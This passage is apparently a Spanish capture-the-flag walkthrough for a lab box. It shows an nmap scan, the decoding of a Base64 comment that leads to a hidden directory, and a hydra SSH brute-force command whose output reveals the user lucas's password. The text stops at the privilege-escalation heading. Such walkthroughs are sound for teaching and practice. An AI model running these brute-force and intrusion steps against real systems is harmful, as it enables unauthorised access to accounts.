Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 15:06 EST
Nmap scan report for 172.17.0.2
Host is up (0.000022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 a1:bc:79:1a:34:68:43:d5:f4:d8:65:76:4e:b4:6d:b1 (DSA)
| 2048 38:68:b6:3b:a3:b2:c9:39:a3:d5:f9:97:a9:5f:b3:ab (RSA)
| 256 d2:e2:87:58:d0:20:9b:d3:fe:f8:79:e3:23:4b:df:ee (ECDSA)
|_ 256 b7:38:8d:32:93:ec:4f:11:17:9d:86:3c:df:53:67:9a (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Andys's House
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: PARADISE)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: PARADISE)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: b501da0b8f9b
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: b501da0b8f9b
|_ System time: 2025-02-18T20:06:38+00:00
| smb2-time:
| date: 2025-02-18T20:06:39
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.56 seconds
Si vamos a la pagina veremos algo normal, pero si le damos a Go paradise e inspeccionamos el codigo veremos lo siguiente:
<!-- ZXN0b2VzdW5zZWNyZXRvCg== -->
Vemos que esta codificado en Base64 por lo que lo decodificaremos:
echo "ZXN0b2VzdW5zZWNyZXRvCg==" | base64 -d
Info:
estoesunsecreto
Por lo que podemos creer puede ser una contraseña de algun usuario, pero no vamos a tener suerte con ello, si lo intentamos poner como un directorio de URL veremos que si funciona:
URL = http://<IP>/estoesunsecreto
Y vemos un archivo llamado mensaje_para_lucas.txt que contiene lo siguiente:
REMEMBER TO CHANGE YOUR PASSWORD ACCOUNT, BECAUSE YOUR PASSWORD IS DEBIL AND THE HACKERS CAN FIND USING B.F.
Por lo que vemos el usuario lucas tiene una contraseña debil, por lo que vamos a tirarle un ataque de fuerza bruta con hydra, probaremos primero por SSH.
Escalate user lucas
Hydra
hydra -l lucas -P <WORDLIST> ssh://<IP> -t 64
Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-18 15:11:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: lucas password: chocolate
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 7 final worker threads did not complete until end.
[ERROR] 7 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-18 15:11:13
Vemos que hemos obtenido las credenciales del usuario lucas, por lo que nos meteremos por SSH.
SSH
ssh lucas@<IP>
Metemos como contraseña chocolate y veremos que estamos dentro.
Escalate Privileges
Si listamos los permisos SUID que tenemos, veremos lo siguiente:
